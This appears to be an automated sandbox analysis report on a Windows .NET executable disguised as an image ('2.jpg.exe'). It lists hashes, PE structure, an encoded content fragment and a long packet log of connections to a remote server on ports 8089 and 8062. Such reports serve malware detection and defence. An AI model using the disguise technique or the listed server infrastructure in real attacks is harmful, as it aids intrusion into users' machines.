Preview:	qSziZUKVkBtc2wCvw5Fqv86IkFrQ/Gm1uTyfe/qBnZzpYkx2/dxXBHIUh1QLkmH40WJV2smZ+M+hDbOLJfdWbdKrnzYvCbseuli4E77mFREkzPfGkT4Ex8t5mk+ZCNHYgA5DTWKBXqxcOwJlAfXMECSG1x2r8Mpb+QnFilNA4y7BHsmzqFVhfyjvR2wGLub+TmgnZVSxX9kdTbqAwDqmC6uQCyX3m1mtIQBj4emPRQKA/J+61+6xTxKuN18yKxgPBdCo7GICBhQRL4rv375d3Ch+DCVezp3dsMxvbEOUoHiaiEphN//5OFeEPSl27HVbE+FdLu2hfhSsJZgFemVGmMqwKzD4nmKOdN/hF40Vy1flcUW7zHMy+7i+tCmNlcUt+59gnIxM5rCKGgeyJFdQtuvGAgsxjxd9p5gAGM9BFVaFBQSjoqjUtCuoi0lXv0RhZmhRp7MrddrfuLmnFlH4Hxr3AUtN+Y6NFw3Zk3P/X/67FDfw7z6/GZVBl+Y31RRQHeortXt3z9SgV6BcBnZyYf4YKVPnevG0NAL7IBrZqWnnTkOYsEdJMWBJpUPKxEtoSjE54pA66o/vJQBY58b2RoOQZ3+bEZtRnRmDyvyCHSkOaZymsO65kVB9Xb9YO8rEimbnRhr0CtPwg738a7JiRB3YF1plNHGlxGE4nCZ18esol7vwfeO384SKgFJPw4GTmafXvyzelLrNXzcDl3Ap+Oxs7S7EtGhmPxz+DqpLAFgGmqsP0w+EYV/ekCVrc8c7JUC6pe/b0VnhPhatF4UI7G+wG7s7qP89SKOS3AloyCWsRiff0VqUX7snOEj7nM2tooTk3KC6PL/8oKfe30/6Qphsh0jiCrpyCr5N3JnfrDF2KBmDyqy9Du/AoaoyFGaYuAxQA0y6h12tQL9McW4mdytWktkFnNeF7u/ypFJWOEaqoulAirrlhXIuaI1xxG0Sjuannn05aSUd/QY6zeKdb91BO38kTjMmGKos7WS+

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.441091788572866
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	2.jpg.exe
File size:	34'304 bytes
MD5:	93fb70bf6b2fc6da414d9e6a80ecda4f
SHA1:	f04e6e242635c94df8e052a589a886a506095db1
SHA256:	2b5a8036263fe6e79d34e9b1a51a73e86cdc53a6d1037e07d9ecbe5a3de29126
SHA512:	34eb3bfbb96848a72823f52fca242de56081b346eff476dc2ecae50258cbbb63c45e252163b211e713262d14f736ecfb9e4355a2901cee58147d6d4b69a624f7
SSDEEP:	768:cqjERBv1Q29sOcqtH5uqanxJF2bCfSuCjQOaDCZL:ljwNW29suranxH2ufS/UI
TLSH:	08F2CF5667D48335CBFA48BD306292400272F7CAE905CF8DAA84646F8DB77065A237F5
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...VF................0..\|............... ........@.. ....................................`................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x409a1e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xB1D24656 [Tue Jul 15 11:43:18 2064 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x99c4	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xa000	0x5ac	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xc000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x9930	0x38	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x7a24	0x7c00	d381d674e75ed0c0c63bd27b81fd9600	False	0.8820879536290323	data	7.64504625754152	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xa000	0x5ac	0x600	c6054840c17b81917223c360ff0da006	False	0.4192708333333333	data	4.082090475103654	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xc000	0xc	0x200	745e5919a72344bbf5caa7d45da2d185	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xa090	0x31c	data			0.43090452261306533
RT_MANIFEST	0xa3bc	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 19, 2024 09:49:58.613048077 CEST	49730	8089	192.168.2.4	8.218.236.5
Apr 19, 2024 09:49:58.931361914 CEST	8089	49730	8.218.236.5	192.168.2.4
Apr 19, 2024 09:49:58.931478024 CEST	49730	8089	192.168.2.4	8.218.236.5
Apr 19, 2024 09:49:58.932440996 CEST	49730	8089	192.168.2.4	8.218.236.5
Apr 19, 2024 09:49:59.250965118 CEST	8089	49730	8.218.236.5	192.168.2.4
Apr 19, 2024 09:49:59.251029015 CEST	8089	49730	8.218.236.5	192.168.2.4
Apr 19, 2024 09:49:59.251070023 CEST	8089	49730	8.218.236.5	192.168.2.4
Apr 19, 2024 09:49:59.251112938 CEST	8089	49730	8.218.236.5	192.168.2.4
Apr 19, 2024 09:49:59.251152039 CEST	8089	49730	8.218.236.5	192.168.2.4
Apr 19, 2024 09:49:59.251149893 CEST	49730	8089	192.168.2.4	8.218.236.5
Apr 19, 2024 09:49:59.251219988 CEST	8089	49730	8.218.236.5	192.168.2.4
Apr 19, 2024 09:49:59.251230001 CEST	49730	8089	192.168.2.4	8.218.236.5
Apr 19, 2024 09:49:59.251261950 CEST	8089	49730	8.218.236.5	192.168.2.4
Apr 19, 2024 09:49:59.251298904 CEST	8089	49730	8.218.236.5	192.168.2.4
Apr 19, 2024 09:49:59.251312017 CEST	49730	8089	192.168.2.4	8.218.236.5
Apr 19, 2024 09:49:59.251343012 CEST	8089	49730	8.218.236.5	192.168.2.4
Apr 19, 2024 09:49:59.251383066 CEST	8089	49730	8.218.236.5	192.168.2.4
Apr 19, 2024 09:49:59.251394987 CEST	49730	8089	192.168.2.4	8.218.236.5
Apr 19, 2024 09:49:59.251435041 CEST	49730	8089	192.168.2.4	8.218.236.5
Apr 19, 2024 09:49:59.255718946 CEST	49730	8089	192.168.2.4	8.218.236.5
Apr 19, 2024 09:49:59.314467907 CEST	49731	8089	192.168.2.4	8.218.236.5
Apr 19, 2024 09:49:59.574419022 CEST	8089	49730	8.218.236.5	192.168.2.4
Apr 19, 2024 09:49:59.632081985 CEST	8089	49731	8.218.236.5	192.168.2.4
Apr 19, 2024 09:49:59.632213116 CEST	49731	8089	192.168.2.4	8.218.236.5
Apr 19, 2024 09:49:59.632394075 CEST	49731	8089	192.168.2.4	8.218.236.5
Apr 19, 2024 09:49:59.950138092 CEST	8089	49731	8.218.236.5	192.168.2.4
Apr 19, 2024 09:49:59.950258017 CEST	8089	49731	8.218.236.5	192.168.2.4
Apr 19, 2024 09:49:59.950304985 CEST	8089	49731	8.218.236.5	192.168.2.4
Apr 19, 2024 09:49:59.950351000 CEST	8089	49731	8.218.236.5	192.168.2.4
Apr 19, 2024 09:49:59.950381041 CEST	49731	8089	192.168.2.4	8.218.236.5
Apr 19, 2024 09:49:59.950468063 CEST	49731	8089	192.168.2.4	8.218.236.5
Apr 19, 2024 09:49:59.950618029 CEST	49731	8089	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:00.086963892 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:00.268054008 CEST	8089	49731	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:00.410806894 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:00.411135912 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:00.411428928 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:00.735203028 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:00.735272884 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:00.735321045 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:00.735359907 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:00.735398054 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:00.735438108 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:00.735477924 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:00.735517025 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:00.735522985 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:00.735522985 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:00.735558033 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:00.735594034 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:00.735596895 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:00.735614061 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:00.735635996 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:00.735701084 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:00.735701084 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:00.736275911 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.059528112 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.059561014 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.059578896 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.059596062 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.059607029 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.059612989 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.059632063 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.059640884 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.059648991 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.059668064 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.059684038 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.059686899 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.059700966 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.059717894 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.059735060 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.059745073 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.059755087 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.059758902 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.059772015 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.059788942 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.059792042 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.059807062 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.059813976 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.059825897 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.059842110 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.059853077 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.059861898 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.059880018 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.059885025 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.059907913 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.059938908 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.383791924 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.383819103 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.383843899 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.383862019 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.383882046 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.383899927 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.383908987 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.383919001 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.383936882 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.383955956 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.383972883 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.383975983 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.383991957 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.384001970 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.384008884 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.384026051 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.384027004 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.384044886 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.384063005 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.384071112 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.384080887 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.384109974 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.384114981 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.384126902 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.384134054 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.384151936 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.384160042 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.384171009 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.384181023 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.384188890 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.384201050 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.384206057 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.384224892 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.384224892 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.384244919 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.384258986 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.384263992 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.384280920 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.384290934 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.384299040 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.384315968 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.384325981 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.384336948 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.384346008 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.384355068 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.384371996 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.384378910 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.384391069 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.384407997 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.384418011 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.384426117 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.384443045 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.384448051 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.384460926 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.384468079 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.384479046 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.384496927 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.384510040 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.384515047 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.384531975 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.384545088 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.384576082 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.708045959 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.708070040 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.708089113 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.708121061 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.708159924 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.708349943 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.708367109 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.708384037 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.708395958 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.708401918 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.708419085 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.708436012 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.708441019 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.708451033 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.708468914 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.708472967 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.708487034 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.708503008 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.708513021 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.708528042 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.708528042 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.708529949 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.708549023 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.708554029 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.708565950 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.708581924 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.708589077 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.708600044 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.708610058 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.708616018 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.708631992 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.708642006 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.708648920 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.708664894 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.708673954 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.708692074 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.708693027 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.708712101 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.708719969 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.708729029 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.708735943 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.708753109 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.708770037 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.708775043 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.708787918 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.708805084 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.708811998 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.708822966 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.708828926 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.708848000 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.708863974 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.708870888 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.708880901 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.708897114 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.708913088 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.708923101 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.708923101 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.708930969 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.708947897 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.708956003 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.708965063 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.708981991 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.708992958 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.708997965 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.709014893 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.709019899 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.709032059 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.709048986 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.709052086 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.709064960 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.709083080 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.709088087 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.709100008 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.709108114 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.709115982 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.709131956 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.709144115 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.709148884 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.709166050 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.709177017 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.709182024 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.709197998 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.709203005 CEST	49732	8062	192.168.2.4	8.218.236.5
